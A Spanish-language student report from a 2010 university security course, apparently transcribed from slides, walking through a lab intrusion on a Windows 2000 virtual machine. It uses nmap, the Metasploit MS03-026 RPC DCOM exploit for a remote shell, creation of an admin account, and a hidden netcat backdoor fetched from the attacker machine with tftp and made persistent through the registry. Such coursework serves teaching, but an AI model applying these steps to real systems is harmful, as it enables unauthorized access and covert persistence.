Informe Ataque informatico
-
Upload
marco-antonio-chavez-carranza -
Category
Documents
-
view
343 -
download
0
Transcript of Informe Ataque informatico
1 Seguridad Informática
UNPRG- ING. DE SISTEMAS
Universidad Nacional “Pedro Ruiz Gallo” FACULTAD DE INGENIERÍA CIVIL SISTEMAS Y ARQUITECTURA
Escuela Profesional de ingeniería de Sistemas
ALUMNOS:
Chávez Carranza, MARCO
CURSO:
Seguridad Informática
DOCENTE:
Puicán, ROBERTO
Lambayeque, 2010
INTROMISION A UN SISTEMA
OPERATIVO
2 Seguridad Informática
UNPRG- ING. DE SISTEMAS
ATAQUE INFORMÁTICO EJECUCIÓN
Se Desea hacer una intromisión desde BackTrack-4 a un computador con Sistema Operativo Windows Server 2000. PASO I (Reconocimiento de Nuestra Víctima)
Sabiendo el IP del computador víctima, nos queda averiguar los puertos vértices de ataque, para lo cual utilizaremos un Software de Mapeo (NMAP).
Como comando de mapeo utilizaremos a: <nmap –vv –P0 -sT> un TCP Connect(), solo queremos averiguar que puertos pueden estar abiertos y dirigir hacia {el nuestro ataque, el sondeo se ejecutara de esta manera:
o NMAP:
3 Seguridad Informática
UNPRG- ING. DE SISTEMAS
o Comando de Sondeo:
o Resultados:
4 Seguridad Informática
UNPRG- ING. DE SISTEMAS
Éstos resultados nos muestran que puertos están sensible a ataques,, de los cuales elegiremos el
445 para nuestro caso, sin embargo podemos utilizar cualquiera de estos para nuestra pruebas, y
verificar la posibilidad de una intromisión de alguno de ellos
o Computador Víctima:
Ya tenemos reconocido el computador víctima Ahora!
PASO II (GENERALIDADES DEL ATACANTE)
o Software Atacante
5 Seguridad Informática
UNPRG- ING. DE SISTEMAS
Para trabajar en modo visual iniciamos el proceso STARTX, además necesitamos iniciar el proceso
de Red para que BT4 reconozca la NIC instalada mediante el comando </etc/init.d/Networking
Start>, haremos esto antes de iniciar el STARTX, sin embargo podemos iniciarlo ya desde modo
visual ingresando a TERMINAL y escribimos el mismo comando
o Esperamos a cargar el sistema Tenemos el modo visual iniciado y verificamos en la direccion <Inicio->Settings->Internet & network-<>NetWork interfaces> visualizamos entonces la NIC de nuestra PC atacante.
6 Seguridad Informática
UNPRG- ING. DE SISTEMAS
Ttenemos ahora lo necesario para hacer nuestra intromisión, Sigue!
PASO III (Ataque Propiamente Dicho)
o Carga de Servicios Necesarios: Cargamos el proceso: framework2-Msfweb <Inciio->BackTrack->Penetration->Metastploit Explotation framework->MsfWeb>
Para realizar la intromisión de software malicioso en un Sistema operativo, necesitamos
un puerto abierto, ademas de una aplicación que explote este puerto de modo que la
deje en modo Expuesto, de esta manera tomaremos el control de dicha
maquina, para lograr esto necesitamos un Exploit «Pieza de
software, un fragmento de datos, o una secuencia de comandos
con el fin de automatizar el aprovechamiento de un error, fallo o
vulnerabilidad, a fin de causar un comportamiento no deseado o
imprevisto en los programas informáticos, hardware, o
componente electrónico (por lo general computarizado) », dicho
esto, buscaremos los exploits disponibles, para lo cual ya hemos
levantado el proceso MSFWEB, y ahora desde el Firefox se nos serán
visibles.
7 Seguridad Informática
UNPRG- ING. DE SISTEMAS
o Desde el Firefox
En la barra de direcciones ingresaremos al localhost:55555, y nos ubicamos en EXPLOITS
8 Seguridad Informática
UNPRG- ING. DE SISTEMAS
Buscamos el Exploit según el Sistema operativo atacado, en nuestro Caso es un Windows Server 2000 de modo que es tipo Win32>
Usaremos el Exploit «Microsoft RPC DCOM MS03-026»
9 Seguridad Informática
UNPRG- ING. DE SISTEMAS
Seleccnionamos el Destino que en este Caso es 0-WindowsNT SP3-6ª/2K/XP/2K/Eng…
Utilizaremos la aplicación win32_bind
10 Seguridad Informática
UNPRG- ING. DE SISTEMAS
Le indicamos el Ip del Computador Víctima «192.168.1.18»y como podemos ver el puerto vulnerable es el 135 -msrpc, puerto que a su vez se encuentra abierto en el sistema operativo según el mapeo realizado anteriormente.
11 Seguridad Informática
UNPRG- ING. DE SISTEMAS
En adelante tenemos la Shell remota y podemos tomar control de la maquina , por lo pronto hemos ingresado a su Sistema y tenemos Control Sobre su MS-DOS. A partir de ahora, teniendo el acceso remoto a la Shell del Computador Víctima, usaremos un software de control de comandos remotos, en este caso usaremos el AWRC (Atelier Web Remote Commander), que lo podemos descargar en (http://www.megaupload.com/?d=ZTATY555). Teniedo este acceso podemos crear un usuario, y posteriormente incluirle en el grupo de administradores.
12 Seguridad Informática
UNPRG- ING. DE SISTEMAS
PASO IV (Obtener un Escritorio Remoto)
Con Ayuda del Atelier Web Remote Commander que será instalada en un computador aleatoriamente ubicado, conectado en red con el resto de computadores, para nuestro caso como estamos trabajado con maquinas virtuales (Computador Atacante – Computador Víctima) el host del AWRC sera nuestra maquina Física, tendremos control sobre el computador Víctima:
13 Seguridad Informática
UNPRG- ING. DE SISTEMAS
Ahora estamos viendo la vista en paralelo del control remoto sobre el computador víctima, a la derecha es el escritorio desde AWRC y a la izquierda es la maquina real.
14 Seguridad Informática
UNPRG- ING. DE SISTEMAS
PASO IV (BackDoor en la Maquina Atacada)
Despues de haber obtenido un escritorio remoto mediante AWRC, ponemos un backdoor para contolar de manera remora pero a la vez de manera oculta para el host atacado.
En el terminal del Backtrack ingresamos en:
Dentro del terminal en BackTrack escribimos:
o cd /ls/pentest/windows-binaries/tools
Localizamos el archivo nc.exe y lo copiamos con “cp nc.exe /tmp”.
Lo verificamos con “ls/tmp”.
Escribimos en Comand de BackTrack en la sesion iniciada con el exploit: “tftp -i 192.168.1.207 get nc.exe C:\nc.exe”
15 Seguridad Informática
UNPRG- ING. DE SISTEMAS
Ahora editamos el registro
16 Seguridad Informática
UNPRG- ING. DE SISTEMAS
17 Seguridad Informática
UNPRG- ING. DE SISTEMAS
nc –p 69 192.168.1.34 69